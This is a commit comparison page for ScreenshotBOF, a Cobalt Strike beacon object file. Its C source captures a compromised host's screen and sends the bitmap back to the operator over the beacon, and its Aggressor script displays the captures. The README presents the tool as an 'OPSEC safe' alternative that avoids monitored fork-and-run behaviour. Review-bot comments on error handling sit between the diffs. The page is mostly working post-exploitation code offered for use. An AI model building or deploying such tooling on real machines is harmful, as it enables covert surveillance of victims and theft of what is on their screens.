Compare commits
25 Commits
in_memory_
...
master
Author | SHA1 | Date |
---|---|---|
CodeXTF2 | 9bdc050f24 | |
CodeXTF2 | dd8b6d02dd | |
CodeXTF2 | e098c519a8 | |
CodeXTF2 | 9892cbdcd0 | |
CodeXTF2 | 95b1311d60 | |
CodeXTF2 | c61e2259fa | |
CodeXTF2 | bb72621cd3 | |
CodeX | 20989d338d | |
CodeX | b5bf5bad8c | |
CodeX | c2dbb32115 | |
CodeX | 0844cb819f | |
CodeX | 98d0c1746b | |
CodeXTF2 | 3a96075d72 | |
CodeXTF2 | 053e265950 | |
CodeXTF2 | fad595320d | |
CodeXTF2 | 41b9629f38 | |
CodeX | c9011f6684 | |
CodeX | 9de5381c0a | |
CodeX | 1f0ad54b5c | |
BinaryFaultline | 1c4b3d84cc | |
BinaryFaultline | dea10235e2 | |
BinaryFaultline | f6fd0e6738 | |
CodeX | 263b680944 | |
CodeXTF2 | 4f66ef6b8e | |
CodeXTF2 | 7e0ee92cc4 |
39
README.md
39
README.md
|
@ -1,37 +1,42 @@
|
||||||
# ScreenshotBOF
|
# ScreenshotBOF
|
||||||
|
|
||||||
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
|
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
|
||||||
|
|
||||||
## Self Compilation
|
## Self Compilation
|
||||||
1. git clone the repo
|
1. git clone the repo
|
||||||
2. open the solution in Visual Studio
|
2. open the solution in Visual Studio
|
||||||
3. Build project BOF
|
3. Build project BOF
|
||||||
|
|
||||||
|
## Save methods:
|
||||||
|
0. drop file to disk
|
||||||
|
1. download file over beacon (Cobalt Strike only)
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
1. import the screenshotBOF.cna script into Cobalt Strike
|
1. import the screenshotBOF.cna script into Cobalt Strike
|
||||||
2. use the command screenshot_bof
|
2. use the command screenshot_bof {local filename} {save method 0/1}
|
||||||
3. Download the screenshot from the target
|
|
||||||
```
|
```
|
||||||
beacon> screenshot_bof
|
beacon> screenshot_bof sad.bmp 1
|
||||||
[*] Running screenshot BOF by (@codex_tf2)
|
[*] Running screenshot BOF by (@codex_tf2)
|
||||||
[+] host called home, sent: 3411 bytes
|
[+] host called home, sent: 5267 bytes
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[*] Tasked beacon to printscreen and save to disk
|
[*] Screen saved to bitmap
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[+] PrintScreen saved to bitmap...
|
[*] Downloading bitmap over beacon with filename sad.bmp
|
||||||
[+] received output:
|
[*] started download of sad.bmp
|
||||||
[+] Printscreen bitmap saved to screenshot.bmp
|
|
||||||
beacon> download screenshot.bmp
|
|
||||||
[*] Tasked beacon to download screenshot.bmp
|
|
||||||
[+] host called home, sent: 22 bytes
|
|
||||||
[*] started download of C:\screenshot.bmp (12441668 bytes)
|
|
||||||
[*] download of screenshot.bmp is complete
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
3. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right clicking the download and clicking "Render BMP" (credit @BinaryFaultline)
|
||||||
|
|
||||||
|
![image](https://user-images.githubusercontent.com/29991665/199232459-0601e5d8-d534-4f05-bde4-c8acf3bd3c12.png)
|
||||||
|
|
||||||
|
![image](https://user-images.githubusercontent.com/29991665/199233465-8159cec4-90a4-4d82-beff-b012753b3559.png)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Notes
|
## Notes
|
||||||
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
||||||
- in memory downloading of screenshots is planned to be added
|
|
||||||
- the filename can be changed in the source code.
|
|
||||||
|
|
||||||
## Why did I make this?
|
## Why did I make this?
|
||||||
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
||||||
|
@ -39,3 +44,5 @@ Cobalt Strike uses a technique known as fork & run for many of its post-ex capab
|
||||||
## Credits
|
## Credits
|
||||||
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
||||||
- Save BMP to file from https://stackoverflow.com/a/60667564
|
- Save BMP to file from https://stackoverflow.com/a/60667564
|
||||||
|
- in memory download from https://github.com/anthemtotheego/CredBandit
|
||||||
|
- @BinaryFaultline for BMP rendering in aggressorscript, and screenshot callback branch
|
||||||
|
|
|
@ -6,6 +6,16 @@
|
||||||
#pragma comment(lib, "Gdi32.lib")
|
#pragma comment(lib, "Gdi32.lib")
|
||||||
|
|
||||||
char downloadfilename[] = "screenshot.bmp";
|
char downloadfilename[] = "screenshot.bmp";
|
||||||
|
|
||||||
|
//i love chatgpt
|
||||||
|
size_t my_strlen(const char* str) {
|
||||||
|
size_t len = 0;
|
||||||
|
while (str[len] != '\0') {
|
||||||
|
len++;
|
||||||
|
}
|
||||||
|
return len;
|
||||||
|
}
|
||||||
|
|
||||||
/*Download File*/
|
/*Download File*/
|
||||||
void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
|
void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
|
||||||
|
|
||||||
|
@ -152,7 +162,7 @@ BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
|
||||||
#pragma endregion
|
#pragma endregion
|
||||||
|
|
||||||
|
|
||||||
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
|
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName, int savemethod)
|
||||||
{
|
{
|
||||||
HDC hDC;
|
HDC hDC;
|
||||||
int iBits;
|
int iBits;
|
||||||
|
@ -226,9 +236,22 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
|
||||||
memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
|
memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
|
||||||
memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
|
memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
|
||||||
|
|
||||||
|
if (savemethod == 0) {
|
||||||
|
BeaconPrintf(0x0, "[*] Saving bitmap to disk with filename %s", lpszFileName);
|
||||||
|
fh = CreateFileA(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
|
||||||
|
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
|
||||||
|
|
||||||
|
if (fh == INVALID_HANDLE_VALUE)
|
||||||
|
return FALSE;
|
||||||
|
WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
|
||||||
|
CloseHandle(fh);
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
BeaconPrintf(0x0, "[*] Downloading bitmap over beacon with filename %s", lpszFileName);
|
||||||
|
downloadFile((char*)lpszFileName, my_strlen(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
|
|
||||||
//WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
|
|
||||||
|
|
||||||
/* clean up */
|
/* clean up */
|
||||||
GlobalUnlock(hDib);
|
GlobalUnlock(hDib);
|
||||||
|
@ -242,8 +265,13 @@ void go(char* buff, int len) {
|
||||||
datap parser;
|
datap parser;
|
||||||
char * downloadfilename;
|
char * downloadfilename;
|
||||||
BeaconDataParse(&parser, buff, len);
|
BeaconDataParse(&parser, buff, len);
|
||||||
|
//what should the file be named?
|
||||||
downloadfilename = BeaconDataExtract(&parser, NULL);
|
downloadfilename = BeaconDataExtract(&parser, NULL);
|
||||||
BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename);
|
//how should it be saved?
|
||||||
|
//0 - drop to disk
|
||||||
|
//1 - download as file in cobaltstrike
|
||||||
|
//2 - NOT IMPLEMENTED YET - planned to be screenshot callback, refer to branch.
|
||||||
|
int savemethod = BeaconDataInt(&parser);
|
||||||
int x1, y1, x2, y2, w, h;
|
int x1, y1, x2, y2, w, h;
|
||||||
// get screen dimensions
|
// get screen dimensions
|
||||||
x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
|
x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
|
||||||
|
@ -269,10 +297,9 @@ void go(char* buff, int len) {
|
||||||
SetClipboardData(CF_BITMAP, hBitmap);
|
SetClipboardData(CF_BITMAP, hBitmap);
|
||||||
CloseClipboard();
|
CloseClipboard();
|
||||||
*/
|
*/
|
||||||
|
BeaconPrintf(0x0, "[*] Screen saved to bitmap");
|
||||||
BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
|
|
||||||
LPCSTR filename = (LPCSTR)downloadfilename;
|
LPCSTR filename = (LPCSTR)downloadfilename;
|
||||||
SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
|
SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename,savemethod);
|
||||||
|
|
||||||
//BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
|
//BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
|
||||||
// clean up
|
// clean up
|
||||||
|
|
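Review bot: In the `savemethod == 0` branch, `if (fh == INVALID_HANDLE_VALUE) return FALSE;` leaves the function before the `/* clean up */` block that follows, so `GlobalUnlock(hDib)` and whatever else that block releases are skipped whenever the file cannot be created. The `WriteFile` result and `dwWritten` are ignored as well, and `go` calls `SaveHBITMAPToFile(...)` as a bare statement, so a failed or short write is reported nowhere. Record the outcome in a local and fall through to the cleanup instead of returning early, e.g. `if (fh == INVALID_HANDLE_VALUE) ok = FALSE;` followed by `else { ok = WriteFile(fh, bmpdata, total, &dwWritten, NULL) && dwWritten == total; CloseHandle(fh); }`. Separately, every non-zero `savemethod` (including the value 2 that the comments in `go` mark as not implemented) takes the download branch, and the pointer returned by `BeaconDataExtract` is used with `%s` and `my_strlen` without a NULL check; both values come from the packed arguments and should be validated before use. Both SaveHBITMAPToFile and go start and end outside the hunks shown here.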
|
@ -203,6 +203,7 @@ DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...);
|
||||||
DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
|
DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
|
||||||
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
|
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
|
||||||
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
|
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
|
||||||
|
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
|
||||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
|
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
|
||||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
|
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
|
||||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
|
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
|
||||||
|
|
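Review bot: The added `MSVCRT$strlen` import has no caller in the hunks visible on this page; the source change in the same comparison introduces a hand-written `my_strlen` and uses that for the filename length instead. Keep one of the two: either drop this declaration, or call `MSVCRT$strlen(lpszFileName)` at the `downloadFile` call site and remove `my_strlen`. Whether code outside the visible hunks uses the import cannot be determined from here.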
|
@ -1,25 +0,0 @@
|
||||||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64
|
|
||||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
|
||||||
|
|
||||||
cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp
|
|
||||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source'
|
|
||||||
|
|
||||||
Source.cpp
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
|
|
||||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
|
|
||||||
1 File(s) copied
|
|
||||||
enumerating sections...
|
|
||||||
found debug section.. zeroing it...
|
|
||||||
closing stream...
|
|
||||||
done!
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
|
||||||
BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
|
@ -1,5 +0,0 @@
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog
|
|
|
@ -1,7 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64</ProjectOutputs>
|
|
||||||
<ContentFiles></ContentFiles>
|
|
||||||
<SatelliteDlls></SatelliteDlls>
|
|
||||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
|
||||||
</Project>
|
|
Binary file not shown.
|
@ -1,25 +0,0 @@
|
||||||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86
|
|
||||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
|
||||||
|
|
||||||
cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp
|
|
||||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source'
|
|
||||||
|
|
||||||
Source.cpp
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
|
|
||||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
|
|
||||||
1 File(s) copied
|
|
||||||
enumerating sections...
|
|
||||||
found debug section.. zeroing it...
|
|
||||||
closing stream...
|
|
||||||
done!
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
|
||||||
BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
|
@ -1,5 +0,0 @@
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog
|
|
|
@ -1,7 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32</ProjectOutputs>
|
|
||||||
<ContentFiles></ContentFiles>
|
|
||||||
<SatelliteDlls></SatelliteDlls>
|
|
||||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
|
||||||
</Project>
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,24 +1,198 @@
|
||||||
|
import javax.imageio.ImageIO;
|
||||||
|
import java.awt.*;
|
||||||
|
import javax.swing.JLabel;
|
||||||
|
import javax.swing.ImageIcon;
|
||||||
|
import java.io.ByteArrayInputStream;
|
||||||
|
|
||||||
|
# This function takes in a screenshot and creates a JLabel to display the screenshot
|
||||||
|
sub display_image {
|
||||||
|
local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name');
|
||||||
|
$screenshot = $1;
|
||||||
|
$screenshot_bytes = $screenshot['data'];
|
||||||
|
$bid = $screenshot['bid'];
|
||||||
|
$user = $screenshot['user'];
|
||||||
|
$computer = beacon_info($bid, 'computer');
|
||||||
|
|
||||||
|
$client = getAggressorClient();
|
||||||
|
$MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth];
|
||||||
|
$MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight];
|
||||||
|
|
||||||
|
$bais = [new ByteArrayInputStream: $screenshot_bytes];
|
||||||
|
$image = [ImageIO read: $bais];
|
||||||
|
|
||||||
|
$width = [$image getWidth];
|
||||||
|
$height = [$image getHeight];
|
||||||
|
|
||||||
|
$icon = [new ImageIcon: $image];
|
||||||
|
if ($width > $MAX_IMAGE_WIDTH) {
|
||||||
|
$width = $MAX_IMAGE_WIDTH;
|
||||||
|
}
|
||||||
|
if ($height > $MAX_IMAGE_HEIGHT) {
|
||||||
|
$height = $MAX_IMAGE_HEIGHT;
|
||||||
|
}
|
||||||
|
$scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]];
|
||||||
|
|
||||||
|
$component = [new JLabel: $scaledIcon];
|
||||||
|
$tab_name = "ScreenshotBOF - $user\@$computer";
|
||||||
|
addTab($tab_name, $component, "...");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
# This function takes in a screenshot and creates a JLabel to display the screenshot
|
||||||
|
sub display_downloaded {
|
||||||
|
local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name');
|
||||||
|
|
||||||
|
$screenshot_bytes = $1;
|
||||||
|
$file_name = $2;
|
||||||
|
|
||||||
|
$client = getAggressorClient();
|
||||||
|
$MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth];
|
||||||
|
$MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight];
|
||||||
|
|
||||||
|
$bais = [new ByteArrayInputStream: $screenshot_bytes];
|
||||||
|
$image = [ImageIO read: $bais];
|
||||||
|
|
||||||
|
$width = [$image getWidth];
|
||||||
|
$height = [$image getHeight];
|
||||||
|
|
||||||
|
$icon = [new ImageIcon: $image];
|
||||||
|
if ($width > $MAX_IMAGE_WIDTH) {
|
||||||
|
$width = $MAX_IMAGE_WIDTH;
|
||||||
|
}
|
||||||
|
if ($height > $MAX_IMAGE_HEIGHT) {
|
||||||
|
$height = $MAX_IMAGE_HEIGHT;
|
||||||
|
}
|
||||||
|
$scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]];
|
||||||
|
|
||||||
|
$component = [new JLabel: $scaledIcon];
|
||||||
|
$tab_name = "ScreenshotBOF - $file_name";
|
||||||
|
addTab($tab_name, $component, "...");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
# Checks the screenshot when it comes in to see if it is a BMP, then if so, renders it in a new tab
|
||||||
|
on screenshots {
|
||||||
|
local('$screenshot $data');
|
||||||
|
|
||||||
|
$screenshot = $1;
|
||||||
|
$data = $screenshot['data'];
|
||||||
|
|
||||||
|
# Check the magic header of the data to see if it's a BMP
|
||||||
|
if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
|
||||||
|
display_image($screenshot);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
popup_clear("downloads");
|
||||||
|
popup downloads {
|
||||||
|
# do nothing if nothing is selected
|
||||||
|
if (size($1) == 0) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
item "Interact" {
|
||||||
|
openOrActivate($1[0]["bid"]);
|
||||||
|
}
|
||||||
|
|
||||||
|
menu "&Color" {
|
||||||
|
local('$ids');
|
||||||
|
$ids = map({ return $1["id"]; }, $1);
|
||||||
|
insert_component(colorPanel("accents", $ids));
|
||||||
|
}
|
||||||
|
|
||||||
|
item "Render &BMP" {
|
||||||
|
local('$download $lpath $name $count');
|
||||||
|
foreach $count => $download ($1) {
|
||||||
|
($lpath, $name) = values($download, @("lpath", "name"));
|
||||||
|
|
||||||
|
sync_download($lpath, script_resource("file $+ .$count"), lambda({
|
||||||
|
$handle = openf($1);
|
||||||
|
$data = readb($handle, -1);
|
||||||
|
closef($handle);
|
||||||
|
#println(charAt($data, 0));
|
||||||
|
#println(charAt($data, 1));
|
||||||
|
if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
|
||||||
|
display_downloaded($data, $1);
|
||||||
|
} else {
|
||||||
|
show_error("File is not a Bitmap image");
|
||||||
|
}
|
||||||
|
deleteFile($1);
|
||||||
|
}, \$name));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
popup_clear("screenshots");
|
||||||
|
popup screenshots {
|
||||||
|
item "&Interact" {
|
||||||
|
openOrActivate($1["bid"]);
|
||||||
|
}
|
||||||
|
|
||||||
|
menu "&Color" {
|
||||||
|
insert_component(colorPanel("accents", $1["id"]));
|
||||||
|
}
|
||||||
|
|
||||||
|
item "&Save" {
|
||||||
|
prompt_file_save($1["id"] . ".jpg", lambda({
|
||||||
|
local('$handle');
|
||||||
|
$handle = openf("> $+ $1");
|
||||||
|
writeb($handle, $data);
|
||||||
|
closef($handle);
|
||||||
|
|
||||||
|
show_message("Screenshot saved.");
|
||||||
|
}, $data => $1["object"]["data"]));
|
||||||
|
}
|
||||||
|
|
||||||
|
separator();
|
||||||
|
|
||||||
|
item "&Remove" {
|
||||||
|
redactobject($1["id"]);
|
||||||
|
}
|
||||||
|
|
||||||
|
item "Render &BMP" {
|
||||||
|
$data = $1["object"]['data'];
|
||||||
|
|
||||||
|
# Check the magic header of the data to see if it's a BMP
|
||||||
|
if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
|
||||||
|
display_image($1["object"]);
|
||||||
|
} else {
|
||||||
|
show_error("Image is not a Bitmap. It should render in Screenshots tab.");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
#Register command
|
#Register command
|
||||||
beacon_command_register(
|
beacon_command_register(
|
||||||
"screenshot_bof",
|
"screenshot_bof",
|
||||||
"Alternative screenshot capability that does not do fork n run",
|
"Alternative screenshot capability that does not do fork n run",
|
||||||
"Synopsis: screenshot_bof"
|
"Use: screenshot_bof [filename] [save method]\nSave methods:\n\t0: drop file to disk\n\t1: download over beacon\n\nTake a screenshot inline using a BOF. Screenshot is saved as BMP on disk or downloaded over beacon."
|
||||||
);
|
);
|
